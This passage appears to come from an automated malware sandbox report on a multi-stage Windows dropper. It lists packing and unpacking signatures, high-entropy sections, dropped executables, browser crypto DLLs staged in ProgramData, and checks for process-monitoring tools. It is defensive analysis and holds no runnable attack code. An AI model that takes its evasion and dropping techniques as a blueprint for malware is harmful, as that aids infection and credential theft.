                              Source: Binary string: wkernel32.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2353199945.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353306605.0000000005260000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361311629.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361403790.00000000053A0000.00000004.00000001.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeUnpacked PE file: 3.2.1I15f6.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeUnpacked PE file: 5.2.2i7672.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxigntbe:EW;dmgkcopc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxigntbe:EW;dmgkcopc:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeUnpacked PE file: 10.2.3m20j.exe.ca0000.0.unpack :EW;.rsrc:W;.idata :W;mtxeekvl:EW;yfmqoglc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mtxeekvl:EW;yfmqoglc:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeUnpacked PE file: 12.2.5813f66ed1.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xnuzvlhe:EW;tzuttanx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xnuzvlhe:EW;tzuttanx:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeUnpacked PE file: 19.2.ae64e67a81.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vxwcoufq:EW;pnspstga:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vxwcoufq:EW;pnspstga:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 24.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW;
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeUnpacked PE file: 32.2.HIDGCFBFBF.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW;
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeUnpacked PE file: 41.2.d1a239d4e2ee4a8aa1443a088d48cd64.exe.5f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeUnpacked PE file: 42.2.d689b693b2.exe.ca0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pggsbtrm:EW;umcppckl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pggsbtrm:EW;umcppckl:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 43.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;odogmioi:EW;qyfccaeh:EW;.taggant:EW;
                              .NET source code contains potential unpacker
                              Source: 17.2.fc1570cd0d.exe.43c5b98.0.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                              Yara detected Costura Assembly Loader
                              Source: Yara matchFile source: 18.2.fc1570cd0d.exe.38ad790.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.2.fc1570cd0d.exe.5160000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000002.2310077330.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000002.2318789762.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: fc1570cd0d.exe PID: 6708, type: MEMORYSTR
                              Source: random[2].exe0.4.drStatic PE information: 0xC03B6D70 [Sun Mar 13 18:41:52 2072 UTC]
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00DF2F1D
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: random[1].exe.4.drStatic PE information: real checksum: 0x1ceb69 should be: 0x1dabc0
                              Source: fc1570cd0d.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                              Source: 3800cab1bc.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x6066
                              Source: random[1].exe2.4.drStatic PE information: real checksum: 0x1e5c7d should be: 0x1f3c95
                              Source: 4l693L.exe.0.drStatic PE information: real checksum: 0x1b054c should be: 0x1b7569
                              Source: 1I15f6.exe.2.drStatic PE information: real checksum: 0x2e8a78 should be: 0x2eb1ff
                              Source: random[1].exe0.4.drStatic PE information: real checksum: 0x449815 should be: 0x446a5c
                              Source: 3m20j.exe.1.drStatic PE information: real checksum: 0x2d0d37 should be: 0x2dd366
                              Source: 7ab555facf.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                              Source: random[2].exe0.4.drStatic PE information: real checksum: 0x0 should be: 0x6066
                              Source: random[1].exe1.4.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                              Source: random[3].exe.10.drStatic PE information: real checksum: 0x2e8a78 should be: 0x2eb1ff
                              Source: 2i7672.exe.2.drStatic PE information: real checksum: 0x1ca204 should be: 0x1d0023
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: real checksum: 0x2e8a78 should be: 0x2eb1ff
                              Source: 941d08ea4f.exe.4.drStatic PE information: real checksum: 0x449815 should be: 0x446a5c
                              Source: skotes.exe.3.drStatic PE information: real checksum: 0x2e8a78 should be: 0x2eb1ff
                              Source: 5813f66ed1.exe.4.drStatic PE information: real checksum: 0x1ceb69 should be: 0x1dabc0
                              Source: ae64e67a81.exe.4.drStatic PE information: real checksum: 0x1e5c7d should be: 0x1f3c95
                              Source: random[2].exe.4.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                              Source: 4l693L.exe.0.drStatic PE information: section name:
                              Source: 4l693L.exe.0.drStatic PE information: section name: .idata
                              Source: 4l693L.exe.0.drStatic PE information: section name:
                              Source: 4l693L.exe.0.drStatic PE information: section name: qpxzdhbb
                              Source: 4l693L.exe.0.drStatic PE information: section name: imlhbikp
                              Source: 4l693L.exe.0.drStatic PE information: section name: .taggant
                              Source: 3m20j.exe.1.drStatic PE information: section name:
                              Source: 3m20j.exe.1.drStatic PE information: section name: .idata
                              Source: 3m20j.exe.1.drStatic PE information: section name: mtxeekvl
                              Source: 3m20j.exe.1.drStatic PE information: section name: yfmqoglc
                              Source: 3m20j.exe.1.drStatic PE information: section name: .taggant
                              Source: 1I15f6.exe.2.drStatic PE information: section name:
                              Source: 1I15f6.exe.2.drStatic PE information: section name: .idata
                              Source: 1I15f6.exe.2.drStatic PE information: section name: odogmioi
                              Source: 1I15f6.exe.2.drStatic PE information: section name: qyfccaeh
                              Source: 1I15f6.exe.2.drStatic PE information: section name: .taggant
                              Source: 2i7672.exe.2.drStatic PE information: section name:
                              Source: 2i7672.exe.2.drStatic PE information: section name: .idata
                              Source: 2i7672.exe.2.drStatic PE information: section name:
                              Source: 2i7672.exe.2.drStatic PE information: section name: jxigntbe
                              Source: 2i7672.exe.2.drStatic PE information: section name: dmgkcopc
                              Source: 2i7672.exe.2.drStatic PE information: section name: .taggant
                              Source: skotes.exe.3.drStatic PE information: section name:
                              Source: skotes.exe.3.drStatic PE information: section name: .idata
                              Source: skotes.exe.3.drStatic PE information: section name: odogmioi
                              Source: skotes.exe.3.drStatic PE information: section name: qyfccaeh
                              Source: skotes.exe.3.drStatic PE information: section name: .taggant
                              Source: random[1].exe.4.drStatic PE information: section name:
                              Source: random[1].exe.4.drStatic PE information: section name: .idata
                              Source: random[1].exe.4.drStatic PE information: section name:
                              Source: random[1].exe.4.drStatic PE information: section name: xnuzvlhe
                              Source: random[1].exe.4.drStatic PE information: section name: tzuttanx
                              Source: random[1].exe.4.drStatic PE information: section name: .taggant
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name:
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: .idata
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name:
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: xnuzvlhe
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: tzuttanx
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: .taggant
                              Source: random[1].exe0.4.drStatic PE information: section name:
                              Source: random[1].exe0.4.drStatic PE information: section name: .idata
                              Source: random[1].exe0.4.drStatic PE information: section name:
                              Source: random[1].exe0.4.drStatic PE information: section name: souunsyz
                              Source: random[1].exe0.4.drStatic PE information: section name: zkkgfegk
                              Source: random[1].exe0.4.drStatic PE information: section name: .taggant
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name:
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: .idata
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name:
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: souunsyz
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: zkkgfegk
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: .taggant
                              Source: random[1].exe2.4.drStatic PE information: section name:
                              Source: random[1].exe2.4.drStatic PE information: section name: .idata
                              Source: random[1].exe2.4.drStatic PE information: section name:
                              Source: random[1].exe2.4.drStatic PE information: section name: vxwcoufq
                              Source: random[1].exe2.4.drStatic PE information: section name: pnspstga
                              Source: random[1].exe2.4.drStatic PE information: section name: .taggant
                              Source: ae64e67a81.exe.4.drStatic PE information: section name:
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: .idata
                              Source: ae64e67a81.exe.4.drStatic PE information: section name:
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: vxwcoufq
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: pnspstga
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: .taggant
                              Source: random[3].exe.10.drStatic PE information: section name:
                              Source: random[3].exe.10.drStatic PE information: section name: .idata
                              Source: random[3].exe.10.drStatic PE information: section name: odogmioi
                              Source: random[3].exe.10.drStatic PE information: section name: qyfccaeh
                              Source: random[3].exe.10.drStatic PE information: section name: .taggant
                              Source: freebl3.dll.10.drStatic PE information: section name: .00cfg
                              Source: freebl3[1].dll.10.drStatic PE information: section name: .00cfg
                              Source: mozglue.dll.10.drStatic PE information: section name: .00cfg
                              Source: mozglue[1].dll.10.drStatic PE information: section name: .00cfg
                              Source: msvcp140.dll.10.drStatic PE information: section name: .didat
                              Source: msvcp140[1].dll.10.drStatic PE information: section name: .didat
                              Source: nss3.dll.10.drStatic PE information: section name: .00cfg
                              Source: nss3[1].dll.10.drStatic PE information: section name: .00cfg
                              Source: softokn3.dll.10.drStatic PE information: section name: .00cfg
                              Source: softokn3[1].dll.10.drStatic PE information: section name: .00cfg
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name:
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: .idata
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: odogmioi
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: qyfccaeh
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: .taggant
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF724D push ecx; ret 0_2_00DF7260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_0062724D push ecx; ret 1_2_00627260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E724D push ecx; ret 2_2_003E7260
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006CD91C push ecx; ret 3_2_006CD92F
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006C1359 push es; ret 3_2_006C135A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D97 push ecx; iretd 12_3_05A90D9A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D97 push ecx; iretd 12_3_05A90D9A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D25 push ecx; ret 12_3_05A90D3A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D25 push ecx; ret 12_3_05A90D3A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8F725 push 00000056h; retf 12_3_05A8F754
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8F725 push 00000056h; retf 12_3_05A8F754
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A91018 push ds; iretd 12_3_05A9105C
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A91018 push ds; iretd 12_3_05A9105C
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D1F push ecx; ret 12_3_05A90D3A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A90D1F push ecx; ret 12_3_05A90D3A
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C362 pushad ; ret 12_3_05A8C365
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C362 pushad ; ret 12_3_05A8C365
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB62 pushad ; retf 12_3_05A8CB65
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB62 pushad ; retf 12_3_05A8CB65
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CF62 pushad ; iretd 12_3_05A8CF65
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CF62 pushad ; iretd 12_3_05A8CF65
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C366 push 6805A8C3h; ret 12_3_05A8C36D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C366 push 6805A8C3h; ret 12_3_05A8C36D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB66 push 6805A8CBh; retf 12_3_05A8CB6D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB66 push 6805A8CBh; retf 12_3_05A8CB6D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CF66 push 6805A8CFh; iretd 12_3_05A8CF6D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CF66 push 6805A8CFh; iretd 12_3_05A8CF6D
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C34E push eax; ret 12_3_05A8C351
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8C34E push eax; ret 12_3_05A8C351
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB4E push eax; retf 12_3_05A8CB51
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_05A8CB4E push eax; retf 12_3_05A8CB51
                              Source: 4l693L.exe.0.drStatic PE information: section name: entropy: 7.765048610408998
                              Source: 4l693L.exe.0.drStatic PE information: section name: qpxzdhbb entropy: 7.953624064508513
                              Source: 1I15f6.exe.2.drStatic PE information: section name: entropy: 7.98706266210044
                              Source: 2i7672.exe.2.drStatic PE information: section name: entropy: 7.974539623835267
                              Source: 2i7672.exe.2.drStatic PE information: section name: jxigntbe entropy: 7.953048455185081
                              Source: skotes.exe.3.drStatic PE information: section name: entropy: 7.98706266210044
                              Source: random[1].exe.4.drStatic PE information: section name: entropy: 7.983709808349382
                              Source: random[1].exe.4.drStatic PE information: section name: xnuzvlhe entropy: 7.953847578299681
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: entropy: 7.983709808349382
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: xnuzvlhe entropy: 7.953847578299681
                              Source: random[1].exe0.4.drStatic PE information: section name: souunsyz entropy: 7.9567248280767044
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: souunsyz entropy: 7.9567248280767044
                              Source: random[1].exe1.4.drStatic PE information: section name: .text entropy: 7.73440914387992
                              Source: fc1570cd0d.exe.4.drStatic PE information: section name: .text entropy: 7.73440914387992
                              Source: random[1].exe2.4.drStatic PE information: section name: entropy: 7.974291844309602
                              Source: random[1].exe2.4.drStatic PE information: section name: vxwcoufq entropy: 7.9528560826806265
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: entropy: 7.974291844309602
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: vxwcoufq entropy: 7.9528560826806265
                              Source: random[3].exe.10.drStatic PE information: section name: entropy: 7.98706266210044
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: entropy: 7.98706266210044

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\Documents\HIDGCFBFBF.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\Users\user\Documents\HIDGCFBFBF.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00DF1AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00621AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00621AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_003E1AE8

                              Boot Survival

                              barindex
                              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: RegmonClassJump to behavior
